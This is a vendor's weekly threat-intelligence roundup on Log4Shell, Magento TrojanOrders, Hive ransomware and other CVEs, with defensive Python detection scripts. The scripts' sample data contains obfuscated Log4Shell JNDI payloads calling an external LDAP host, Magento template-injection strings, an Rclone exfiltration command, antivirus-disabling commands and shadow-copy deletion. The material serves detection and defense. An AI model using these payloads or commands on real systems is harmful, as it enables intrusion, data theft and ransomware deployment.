
CSW's Threat Intelligence - November 14, 2022 - November 18, 2022

Posted on Nov 14, 2022 | Updated on Nov 18, 2022 | By Supriya Aluri

This edition brings you early warnings, trending news about cyber threats, and accurate threat context. Check out which threat group is on the rampage, which vulnerability it could soon weaponize, and more.

Why play catch up when you can fix this now?

Check out our podcast on the top critical threats of this week, hosted by David Rushton!


Trending Threats

CISA Warns Against Iranian APT Groups Attacking Federal Organizations

Iranian government-sponsored APT actors have been exploiting the Log4Shell vulnerability to get into federal networks. In July 2022, CISA found that a Federal Civilian Executive Branch (FCEB) organization had been compromised through an unpatched VMware Horizon server: the attackers exploited Log4Shell to run code on the server, installed XMRig cryptomining software, moved laterally to the domain controller (DC), harvested credentials, and then deployed Ngrok reverse proxies on several hosts to maintain persistence.

CISA recommends that every organization patch affected systems and that organizations running VMware Horizon which did not immediately patch or apply workarounds assume compromise and actively hunt for signs of intrusion, rather than wait for an alert.

Apache Log4j vulnerability CVE-2021-44228 (Log4Shell) is a critical remote code execution flaw: the library resolves ${jndi:...} lookups inside logged strings, so an attacker who gets a crafted string into any log message (a User-Agent header, a username, a search term) can make the application fetch and load a class from an attacker-controlled LDAP or RMI server. It is exploited by many threat actors, and the lookup string is routinely obfuscated with nested lookups to evade simple pattern matching. Check out our blog to learn more about this vulnerability.

CVE Details:

CVE: CVE-2021-44228

CVSS: 10

CWE ID: CWE-400 | CWE-502 | CWE-20 | CWE-917

Exploit Type: RCE, DoS, WebApp, Other

Ransomware: MSIL/Khonsari.A | Conti | AvosLocker | TellYouThePass

APT Association: Bronze Starlight | HAFNIUM | OilRig | Earth Lusca | Winnti Group
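The detection logic below, as an added example that is not part of the original post or of any CISA guidance, shows why a naive search for the string "jndi:" misses most real Log4Shell traffic: attackers nest lookups such as ${lower:j}, ${::-j} or ${env:NOPE:-j} inside the payload, and Log4j resolves them inside out before the JNDI lookup fires. The script mimics that resolution for the lookup types attackers rely on, URL-decodes first, and then searches the normalized line. The Apache-style log lines are constructed for illustration.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in log lines, including the
nested-lookup obfuscations that defeat a naive search for 'jndi:'.

Added example for this post, not code from CISA or the Log4j project; the
sample log lines are constructed."""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
MAX_ROUNDS = 20


def resolve_lookup(body: str) -> str:
    """Approximate how Log4j 2.x evaluates one innermost lookup.

    Only what attackers lean on is modelled: the ':-' default-value syntax
    (a failed lookup yields its default, so ${::-j} and ${env:NOPE:-j} both
    become 'j') and the lower/upper lookups. Anything else is assumed to
    resolve to the empty string."""
    if ":-" in body:
        return body.partition(":-")[2]
    prefix, sep, key = body.partition(":")
    if not sep:
        return ""
    prefix = prefix.lower()
    if prefix == "lower":
        return key.lower()
    if prefix == "upper":
        return key.upper()
    return ""


def normalize(line: str) -> str:
    """URL-decode and collapse nested lookups, inside out, until only the
    jndi lookup itself is left (it is kept verbatim so analysts see the
    payload)."""
    current = line
    for _ in range(MAX_ROUNDS):
        decoded = unquote(current)

        def replace(match):
            body = match.group(1)
            if body.lower().startswith("jndi:"):
                return match.group(0)
            return resolve_lookup(body)

        resolved = INNER_LOOKUP.sub(replace, decoded)
        if resolved == current:
            break
        current = resolved
    return current


def is_log4shell(line: str) -> bool:
    return "jndi:" in normalize(line).lower()


def scan_lines(lines):
    """Return (index, normalized_line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell(line)]


# Constructed sample access log: one plain payload, two nested-lookup
# obfuscations, one URL-encoded payload, and two benign lines.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Nov/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Nov/2022:10:01:07 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [14/Nov/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [14/Nov/2022:10:01:11 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7:1389/c}"',
    '10.0.0.9 - - [14/Nov/2022:10:01:13 +0000] '
    '"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 400 0 "-" "curl/7.85"',
    '10.0.0.5 - - [14/Nov/2022:10:01:15 +0000] "GET /docs/${date:YYYY} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for index, normalized in scan_lines(SAMPLE_LOG):
        print(f"line {index}: {normalized}")
```

Run it against a real access log with `scan_lines(open(path).read().splitlines())`; the normalized form it prints is what you hand to the blocking rule or the LDAP/RMI callback IP lookup. The resolver deliberately keeps the jndi lookup intact instead of resolving it, so a hit always shows the attacker's callback host.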


Magento Stores Under a Barrage of Cyberattacks

In the latest round of attacks, dubbed TrojanOrders, at least seven groups have been compromising Magento / Adobe Commerce stores by exploiting CVE-2022-24086, an improper input validation flaw in the checkout process that lets an unauthenticated attacker execute code on an unpatched store. The attackers register a customer account and place an order that carries Magento template directives in a field such as the customer name or VAT number; when the store later renders that order (for example in the order-confirmation email or the admin order view), the template engine evaluates the directives and the attackers use them to drop a PHP backdoor. From the backdoor they run commands and install remote access trojans (RATs) for further access.

Adobe fixed the vulnerability back in February 2022, yet a large share of store operators still have not applied the patch even though Magento stores are under continuous attack.

Note: the first patch for CVE-2022-24086 was bypassed, and the bypass is tracked separately as CVE-2022-24087. A store is only protected once both fixes are applied.

CVE Details:

CVE | CVSS v3 Score | CVSS v3 Severity | CWE

CVE-2022-24086 | 9.8 | CRITICAL | CWE-20

CVE-2022-24087 | 9.8 | CRITICAL | CWE-20
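The TrojanOrders pattern described above lends itself to a simple pre-rendering check, given here as an added example that is not part of the original post and not Adobe's or Magento's own code: walk every customer-supplied field of an incoming order, undo the URL and HTML-entity encodings attackers use to hide the braces, and refuse the order if a template directive is present. The field list and the sample orders are constructed assumptions.

```python
"""Scan checkout/order records for Magento template directives hidden in
customer-supplied fields (the TrojanOrders pattern).

Added example for this post; the sample orders and the field list are
constructed for illustration."""
import html
import re
from urllib.parse import unquote

# Adobe Commerce / Magento template directives look like {{directive args}},
# e.g. {{var ...}}, {{block ...}}, {{config ...}}. A shopper has no business
# putting '{{' into a name or VAT number at all.
DIRECTIVE = re.compile(r"\{\{\s*([A-Za-z_]+)[^}]*\}\}")

# Checkout fields a shopper controls and that later reach the template filter
# (order emails, invoices, admin grids). Assumed list; adjust to your store.
CUSTOMER_FIELDS = {"firstname", "lastname", "company", "vat_id",
                   "street", "city", "postcode", "telephone", "email"}


def decode(value: str) -> str:
    """Peel off URL and HTML-entity encoding until nothing changes, so that
    '%7B%7B' and '&#123;&#123;' are seen as the '{{' they turn into."""
    prev = None
    while prev != value:
        prev = value
        value = html.unescape(unquote(value))
    return value


def _strings(obj, path=""):
    """Yield (dotted_path, value) for every string leaf in a nested record."""
    if isinstance(obj, dict):
        for key, val in obj.items():
            yield from _strings(val, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for idx, val in enumerate(obj):
            yield from _strings(val, f"{path}[{idx}]")
    elif isinstance(obj, str):
        yield path, obj


def _field_name(path: str) -> str:
    return path.rsplit(".", 1)[-1].split("[", 1)[0]


def find_template_directives(order: dict):
    """Return [(path, directive, decoded_value)] for every suspicious field."""
    hits = []
    for path, raw in _strings(order):
        if _field_name(path) not in CUSTOMER_FIELDS:
            continue
        value = decode(raw)
        if "{{" not in value:
            continue
        match = DIRECTIVE.search(value)
        hits.append((path, match.group(1).lower() if match else "unknown", value))
    return hits


def is_trojan_order(order: dict) -> bool:
    return bool(find_template_directives(order))


# Constructed sample orders: one benign, one carrying directives in three
# fields using plain, URL-encoded and HTML-entity-encoded braces.
SAMPLE_ORDERS = [
    {"increment_id": "100000123",
     "customer": {"firstname": "Alice", "lastname": "Smith", "email": "alice@example.com"},
     "billing_address": {"street": ["1 Main St"], "city": "Springfield",
                         "vat_id": "DE123456789"}},
    {"increment_id": "100000124",
     "customer": {"firstname": "{{var order.increment_id}}", "lastname": "Bob",
                  "email": "bob@example.com"},
     "billing_address": {"street": ["%7B%7Bblock class=%22X%22%7D%7D"],
                         "city": "Nowhere",
                         "vat_id": "&#123;&#123;config path=&quot;web/unsecure/base_url&quot;&#125;&#125;"}},
]

if __name__ == "__main__":
    for order in SAMPLE_ORDERS:
        print(order["increment_id"], find_template_directives(order))
```

Rejecting orders is a compensating control for the window between exploitation and patching, and for retro-hunting in the orders table; it does not replace the Adobe patches, because the same directives can arrive through any other field that reaches the template filter.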


CISA Adds the Second MoTW Vulnerability to the KEV

Last week, CISA added CVE-2022-41091 to the Known Exploited Vulnerabilities (KEV) catalog; on November 14, 2022 it added the second of the two Microsoft Mark-of-the-Web (MoTW) bypasses, CVE-2022-41049. Windows tags files downloaded from the internet with a Zone.Identifier alternate data stream (the Mark of the Web), and SmartScreen and Office Protected View use that tag to warn the user or open the file read-only. These bugs let a specially crafted file arrive without the tag, so a malicious file opened by the user executes without the usual warning. Attackers are already exploiting this to run malicious files and gain access to systems, which is why both CVEs are in the KEV.

CVE Details

CVE: CVE-2022-41049

CVSS: 5.4

Patch Link: Download


OceanLotus APT Group Carries Out Several Malicious Campaigns

OceanLotus (APT32) is an APT group, generally attributed to Vietnam, that targets countries in Asia, the Middle East, and the US. In 2021 the group carried out many attacks exploiting zero-day and N-day vulnerabilities, notably CVE-2020-14882 (Oracle WebLogic remote command execution) and CVE-2021-22986 (F5 BIG-IP iControl REST unauthenticated remote command execution), as well as a JBoss deserialization vulnerability. For lateral movement it staged an encrypted Cobalt Strike loader on a PowerShell-based web server inside the victim network. It also used a trojan together with BusyBox and Dropbear (a small SSH server) to dig further into compromised systems and steal data.

The group now also runs its command and control on Cobalt Strike team servers.


The Chinese APT Group Lotus Blossom Is Attacking Several Asian Countries

Billbug (aka Lotus Blossom), a cyber-espionage group attributed to China, has been active for more than a decade. In its most recent campaign it targeted a certificate authority, several government agencies, and defense organizations in Asia; the activity is assessed to be state-sponsored. The group gets in by exploiting public-facing applications with known vulnerabilities. Going after a certificate authority is what makes this campaign notable: with a trusted signing certificate the attackers could sign their malware so that it evades detection, or intercept HTTPS traffic, although there is no evidence that they managed to obtain one. In one operation the group used Stowaway, a rarely seen multilevel proxy tool that lets penetration testers tunnel through network access restrictions, and its custom backdoors Hannotog and Sagerunex to keep access and execute commands on victims' systems. Billbug's favorite exploits are CVE-2012-0158 and CVE-2017-11882, two old Microsoft Office document vulnerabilities with over 1,000 public exploits between them.


CISA Warns of Hive Ransomware

In its latest #StopRansomware advisory, CISA warned organizations about the Hive ransomware gang. As of November 2022, Hive has claimed more than 1,300 victims, including Damart and Bell Canada, and has received approximately US$100 million in ransom payments. The group favors the ProxyShell vulnerabilities in Microsoft Exchange Server, CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, for initial access. Once inside, the actors disable Windows Defender and other antivirus products to stay in the network longer without being detected, and they exfiltrate data with Rclone to the cloud storage service Mega.nz before encrypting.

Hive is financially motivated and very active in seeking out targets and extracting ransoms. Organizations should patch the vulnerabilities above, watch for Rclone and other unexpected file-transfer tools talking to cloud storage, and alert on attempts to disable security tooling.
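The Rclone-to-Mega exfiltration and antivirus tampering described above are visible in process-creation telemetry, and the hunt below, an added example that is not part of the original post or of the CISA advisory, shows one way to pull them out. It tags Rclone uploads to a remote, resolves the remote's backend type from the host's rclone.conf (the Mega backend is not visible on the command line, only in the config), and matches common Defender-disabling commands. It also flags shadow-copy deletion, a pre-encryption step common to ransomware generally rather than something the paragraph above attributes to Hive. The events, the rclone.conf, and the rule set are constructed assumptions.

```python
"""Hunt process-creation events for Rclone uploads to cloud remotes, antivirus
tampering, and shadow-copy deletion.

Added example for this post, not CISA's or Hive's artifacts; the events and the
rclone.conf below are constructed."""
import configparser
import re
import shlex

# rclone remotes appear on the command line as 'name:path' (or ':backend:path'
# for on-the-fly remotes). Two or more chars rules out Windows drive letters,
# the negative lookahead rules out URLs such as https://.
REMOTE_ARG = re.compile(r"^:?([A-Za-z0-9_.-]{2,}):(?!//)")
RCLONE_UPLOAD_VERBS = {"copy", "copyto", "sync", "move", "moveto"}

# Assumed rule set; extend with your own EDR's vocabulary.
TAMPER_RULES = [
    ("av_tamper", re.compile(
        r"Set-MpPreference\s+-Disable\w+"
        r"|\bDisable(AntiSpyware|AntiVirus|RealtimeMonitoring)\b"
        r"|\bsc(\.exe)?\s+(stop|config)\s+WinDefend\b"
        r"|\bnet(\.exe)?\s+stop\s+\"?Windows Defender", re.I)),
    ("shadow_copy_delete", re.compile(
        r"\bvssadmin(\.exe)?\s+delete\s+shadows\b"
        r"|\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I)),
]


def rclone_remote_types(conf_text: str) -> dict:
    """Map remote name -> backend type from an rclone.conf (INI) file."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(conf_text)
    return {name: parser[name].get("type", "") for name in parser.sections()}


def rclone_remote_args(cmdline: str):
    """Names of the remotes referenced by an rclone command line."""
    names = []
    for token in shlex.split(cmdline, posix=False):
        match = REMOTE_ARG.match(token.strip("\"'"))
        if match:
            names.append(match.group(1))
    return names


def classify(event: dict, remote_types: dict):
    """Return the list of tags that apply to one process-creation event."""
    cmd = event.get("cmdline", "")
    image = event.get("image", "").rsplit("\\", 1)[-1].lower()
    tags = []
    if image.startswith("rclone") or re.search(r"\brclone(\.exe)?\b", cmd, re.I):
        tags.append("rclone_exec")
        tokens = shlex.split(cmd, posix=False)
        if any(t.lower() in RCLONE_UPLOAD_VERBS for t in tokens):
            for name in rclone_remote_args(cmd):
                kind = remote_types.get(name, "unknown")
                tags.append(f"rclone_upload:{name}:{kind}")
    for tag, pattern in TAMPER_RULES:
        if pattern.search(cmd):
            tags.append(tag)
    return tags


def hunt(events, conf_text=""):
    """Return {event_index: tags} for every event that matched something."""
    remote_types = rclone_remote_types(conf_text) if conf_text else {}
    flagged = {}
    for idx, event in enumerate(events):
        tags = classify(event, remote_types)
        if tags:
            flagged[idx] = tags
    return flagged


# Constructed rclone.conf recovered from the host: one Mega remote, one local.
SAMPLE_RCLONE_CONF = """[mega-ex]
type = mega
user = someone@example.com
pass = REDACTED

[localbackup]
type = local
"""

# Constructed process-creation events (image + command line, Sysmon style).
SAMPLE_EVENTS = [
    {"image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"image": "C:\\Users\\Public\\rclone.exe",
     "cmdline": "rclone.exe copy \\\\FS01\\finance mega-ex:stage --transfers 32 -q"},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true\""},
    {"image": "C:\\Windows\\System32\\vssadmin.exe", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"image": "C:\\Users\\Public\\rclone.exe", "cmdline": "rclone.exe lsd localbackup:"},
    {"image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" "
                "/v DisableAntiSpyware /t REG_DWORD /d 1 /f"},
]

if __name__ == "__main__":
    for idx, tags in hunt(SAMPLE_EVENTS, SAMPLE_RCLONE_CONF).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", tags)
```

Any `rclone_upload:<name>:mega` (or any non-local backend) from a file server is worth an immediate look; a bare `rclone_exec` is lower confidence but still unusual on most hosts, and Rclone's presence at all should be compared against what the organization actually deploys.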


Threats to Watch Out For


CVE-2019-8561, CVE-2022-32895: PackageKit Framework Vulnerabilities in macOS

CVE-2019-8561 was discovered and patched by Apple in March 2019. It lives in the PackageKit framework and can be exploited for root privilege escalation and to bypass System Integrity Protection (SIP) restrictions. A researcher recently found that the original fix was incomplete and the bug could still be exploited on later macOS releases, including Monterey. Apple addressed it again under a new identifier, CVE-2022-32895, in macOS Ventura on October 24, 2022.

Because the renewed fix shipped with Ventura, users who stay on older macOS versions remain exposed to root privilege escalation, code-signature bypass, and SIP bypass; they should update immediately.


CVE-2022-34169: Integer Truncation Bug in JIT Compiler

CVE-2022-34169 is an integer truncation bug in XSLTC, the XSLT compiler (from Apache Xalan-J) bundled with the JDK. XSLTC compiles stylesheets to Java bytecode, and the truncation lets a crafted stylesheet produce a malformed class file that the JVM then executes as attacker-controlled bytecode. The XML Signature standard allows an XSLT transform inside a signature, and a verifier that accepts that transform runs untrusted XSLT before the signature is even checked, so a remote attacker can gain arbitrary code execution in many Java-based web applications and identity providers that support SAML single sign-on. The fix shipped in the July 2022 JDK security updates (8u341, 11.0.16, 17.0.4).

XML Signature and SAML stacks are prone to this class of attack because their default configurations are permissive: they accept transforms such as XSLT that are almost never needed in practice. Operators should explicitly restrict what a verifier accepts; in Java, the XML Signature secure validation mode (the org.jcp.xml.dsig.secureValidation property, enabled by default from JDK 17) rejects XSLT transforms along with other risky features.

CVE Details

CVE: CVE-2022-34169

CVSS: 7.20

CWE ID: CWE-434

Exploit Type: RCE, PE, DoS, WebApp

Patch Link: Download


Zimbra Collaboration Suite (ZCS) Vulnerabilities Exploited

Zimbra Collaboration Suite (ZCS) has been under continuous attack through a series of vulnerabilities: CVE-2022-24682, CVE-2022-27924, CVE-2022-27925, CVE-2022-37042, and CVE-2022-30333. In August 2022, CVE-2022-27925 (an authenticated path traversal in the mailbox import feature) chained with CVE-2022-37042 (an authentication bypass for the same endpoint) was used in mass exploitation: the chain lets an unauthenticated attacker upload a crafted archive whose contents are written into the web root. In a recent incident, analysts found three Java Server Pages (JSP) webshells dropped this way; the webshells let the attackers upload further files to the server and execute commands remotely.

Zimbra has patched all of these vulnerabilities and continues to urge customers to apply the patches. Servers that were exposed before patching should also be checked for webshells, because patching does not remove files an attacker has already dropped.


RCE Vulnerability in Backstage Platform

A critical vulnerability in Backstage, the open-source developer portal platform, allows attackers to execute arbitrary code. The root cause is CVE-2022-36067, a sandbox escape in the vm2 JavaScript sandbox library (dubbed SandBreak) that Backstage's software templates use to evaluate template expressions; an attacker who can get a crafted template payload evaluated breaks out of the sandbox and runs code on the Backstage host. Backstage is used by many major organizations, including Netflix, American Airlines, DoorDash, Palo Alto Networks, HP, Siemens, LinkedIn, and Booz Allen Hamilton.

CVE Details:

CVE: CVE-2022-36067

CVSS: 10 

CWE ID: CWE-913

Affected Product Count: 1

Here's the patch  for the vulnerability. 


CVE-2022-41622 and CVE-2022-41800: F5 Vulnerabilities

CVE-2022-41622 is a cross-site request forgery (CSRF) in BIG-IP and BIG-IQ that leads to remote code execution as root. The attacker needs no credentials of their own, but the attack only works if an administrator who is logged into the management interface is lured into visiting an attacker-controlled page, so admin browsing habits and management-plane isolation matter here. Here's the advisory for the vulnerability.

CVE-2022-41800 is an authenticated remote code execution via RPM spec injection in iControl REST. It matters because it affects devices running in Appliance mode, where such command execution is supposed to be blocked. F5 released the security advisory for this vulnerability.


CVE-2022-35803 Patch Bypassed and Exploited

CVE-2022-24481, a privilege escalation vulnerability in the Windows Common Log File System (CLFS) driver, was patched by Microsoft on April Patch Tuesday (12 April 2022). Researchers later found that the patch could be bypassed with an exploit that still grants the attacker elevated privileges; the bypass is tracked as CVE-2022-35803, and Microsoft fixed it in September 2022 by addressing the underlying type confusion. Both are local privilege escalation bugs: the attacker must already have code running on the machine and uses the CLFS flaw to go from a low-privileged user to SYSTEM.

CVE Details:

CVE: CVE-2022-35803

CVSS: 7.8 

Affected Product Count: 19

Users should deploy the September 2022 update immediately; the April patch alone does not close this hole.


Check out this section to track how these threats evolve!


We use our threat intelligence platform driven by Artificial Intelligence (AI) and Machine Learning (ML) models to analyze the vulnerabilities that hackers could potentially exploit. We warn our customers continuously about exposures and prioritize vulnerabilities to facilitate rapid remediation.


Follow our weekly blog and podcast to get proactive alerts on trending threats. Reach out to us if you need help managing your vulnerabilities and exposures.

Leverage our expertise and manage your threats continuously to stay safe from attackers.
